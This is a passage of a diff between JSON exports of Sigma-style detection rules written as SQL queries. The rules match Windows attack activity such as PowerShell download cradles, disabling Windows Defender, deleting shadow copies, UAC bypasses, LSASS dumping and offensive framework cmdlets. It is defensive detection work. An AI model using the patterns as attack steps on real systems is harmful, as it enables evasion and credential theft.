- "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR 